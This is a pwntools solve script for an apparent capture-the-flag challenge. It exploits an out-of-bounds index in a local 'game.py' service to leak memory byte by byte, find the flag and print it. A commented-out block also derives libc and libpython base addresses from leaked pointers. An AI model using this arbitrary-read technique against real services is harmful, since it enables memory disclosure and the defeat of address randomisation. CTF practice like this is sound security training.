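"""solve.py -- pwntools solve script for the "game.py" challenge.

The service (localhost:9090 by default) prompts ``Easy or Hard?``, then
``Ready?``, then ``Index 1:`` / ``Index 2:`` once per round and answers
with a line whose second whitespace-separated field is one byte value.
``leak()`` drives eight such rounds at consecutive second indices to read
one little-endian 64-bit word at a chosen offset; the main section uses
that to locate the flag string and print its bytes.

Usage:
    python solve.py [HOST=<host>] [PORT=<port>] [DEBUG]

HOST, PORT and DEBUG are pwntools ``args`` given on the command line.
"""
import struct
import time

import psutil
from pwn import *

HOST = args.HOST or "localhost"
PORT = int(args.PORT or 9090)

WORD = 8  # bytes returned by one leak(): a single 64-bit word

# Challenge-specific offsets (relative to the service's index base).
# NOTE(review): the meaning of each word is inferred from the original
# variable names; confirm in gdb before reusing them elsewhere.
NUMBERS_OFFSET = -0x30    # word the script later uses as the buffer base
FLAGOBJ_OFFSET = -0xB48   # word presumably holding the flag object's address
FLAG_STR_OFFSET = 0x30    # distance from that object to its string bytes
FLAG_WORDS = 4            # 8-byte chunks of the flag string to print


def attach_debugger():
    """Attach gdb (in a new terminal) to the running game.py, then wait.

    Raises:
        RuntimeError: if no process has ``game.py`` in its command line.
    """
    # presumably gives the freshly spawned handler time to appear -- confirm
    time.sleep(1)
    # process_iter(attrs=...) pre-fetches cmdline and yields None instead of
    # raising AccessDenied for processes we may not inspect.
    pids = [
        p.pid
        for p in psutil.process_iter(["cmdline"])
        if "game.py" in (p.info["cmdline"] or [])
    ]
    if not pids:
        raise RuntimeError("DEBUG: no running process with game.py in its cmdline")
    util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pids[0]}")
    input()  # block until the user has finished setting up gdb


def leak(offset, unpack=True):
    """Read the 8 bytes at ``offset`` by playing one "hard" game.

    Args:
        offset: byte offset of the word to read, relative to the service's
            index base. Negative offsets are sent as their unsigned 64-bit
            (two's-complement) value -- presumably because the service
            parses the index as an unsigned number; confirm against game.py.
        unpack: when True (default) return the word as a little-endian
            unsigned int, otherwise return the raw 8 bytes.

    Returns:
        int or bytes, depending on ``unpack``.

    Raises:
        ValueError: if a reply's second field is not a byte value (0-255).
    """
    io.readuntil(b"Easy or Hard? ")
    io.sendline(b"hard")

    io.readuntil(b"Ready? ")
    io.sendline(b"")

    raw = []
    for i in range(WORD):
        io.readuntil(b"Index 1: ")
        io.sendline(b"0")

        io.readuntil(b"Index 2: ")
        if offset < 0:
            # wrap the whole (negative) offset to unsigned 64-bit once
            index2 = (1 << 64) + offset + i
        else:
            index2 = offset + i
        io.sendline(str(index2).encode())

        reply = io.readline()
        raw.append(int(reply.split(b" ")[1]))

    if unpack:
        return struct.unpack("<Q", bytes(raw))[0]
    return bytes(raw)


# Earlier approach (not used by the main section), kept from the original notes:
# stack_leak = leak(-0x28)
# numbers = stack_leak - 0x100
# print("numbers", hex(numbers))
#
# libc_leak = leak(-0x18)
# libc_clock_gettime = 0x00000000000cd6a0
# libc_base = libc_leak - 29 - libc_clock_gettime
# print("libc", hex(libc_base))
#
# libpython_base = libc_base + 0x1e7000
# print("libpython", hex(libpython_base))
#
# pythonvars_leak = libpython_base + 0x390858
# vars_base = leak(pythonvars_leak - numbers)
# print("pythonvars", hex(vars_base))
#
# flag_var = vars_base + 0x7fd00
# print("flag", hex(flag_var))
#
# for i in range(10):
#     print(leak(flag_var + i * 8 - numbers, False))


if __name__ == "__main__":
    io = remote(HOST, PORT)
    if args.DEBUG:
        attach_debugger()

    numbers = leak(NUMBERS_OFFSET)
    print("numbers", hex(numbers))
    flagobj = leak(FLAGOBJ_OFFSET)
    print("flagobj", hex(flagobj))
    flagstr = flagobj + FLAG_STR_OFFSET

    # leak() takes offsets relative to ``numbers``, so rebase each chunk.
    for i in range(FLAG_WORDS):
        print(leak(flagstr + i * WORD - numbers, False))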